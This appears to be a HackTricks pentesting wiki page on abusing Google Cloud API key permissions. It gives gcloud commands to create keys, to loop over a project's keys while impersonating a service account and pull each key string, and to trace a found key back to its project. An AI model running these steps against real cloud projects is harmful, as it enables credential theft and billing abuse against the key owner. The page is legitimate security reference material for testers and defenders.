Skip to content

Latest commit

 

History

History
80 lines (55 loc) · 4.97 KB

gcp-apikeys-privesc.md

File metadata and controls

80 lines (55 loc) · 4.97 KB
Raw

GCP - Apikeys Privesc

Support HackTricks and get benefits!

apikeys

The following permissions are useful to create and steal API keys, not this from the docs: An API key is a simple encrypted string that identifies an application without any principal. They are useful for accessing public data anonymously, and are used to associate API requests with your project for quota and billing.

Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.

apikeys.keys.create

This permission allows to create an API key:

gcloud alpha services api-keys create
Operation [operations/akmf.p7-[...]9] complete. Result: {
    "@type":"type.googleapis.com/google.api.apikeys.v2.Key",
    "createTime":"2022-01-26T12:23:06.281029Z",
    "etag":"W/\"HOhA[...]==\"",
    "keyString":"AIzaSy[...]oU",
    "name":"projects/5[...]6/locations/global/keys/f707[...]e8",
    "uid":"f707[...]e8",
    "updateTime":"2022-01-26T12:23:06.378442Z"
}

You can find a script to automate the creation, exploit and cleaning of a vuln environment here.

apikeys.keys.getKeyString , apikeys.keys.list

These permissions allows list and get all the apiKeys and get the Key:

gcloud alpha services api-keys create
for  key  in  $(gcloud --impersonate-service-account="${SERVICE_ACCOUNT_ID}@${PROJECT_ID}.iam.gserviceaccount.com" alpha services api-keys list --uri); do
	gcloud --impersonate-service-account="${SERVICE_ACCOUNT_ID}@${PROJECT_ID}.iam.gserviceaccount.com" alpha services api-keys get-key-string "$key"
done

You can find a script to automate the creation, exploit and cleaning of a vuln environment here.

apikeys.keys.regenerate , apikeys.keys.list

These permissions will (potentially) allow you to list and regenerate all the apiKeys getting the new Key.
It’s not possible to use this from gcloud but you probably can use it via the API. Once it’s supported, the exploitation will be similar to the previous one (I guess).

apikeys.keys.lookup

This is extremely useful to check to which GCP project an API key that you have found belongs to:

gcloud alpha services api-keys lookup AIzaSyD[...]uE8Y
name: projects/5[...]6/locations/global/keys/28d[...]e0e
parent: projects/5[...]6/locations/global

In this scenario it could also be interesting to run the tool https://github.com/ozguralp/gmapsapiscanner and check what you can access with the API key

Support HackTricks and get benefits!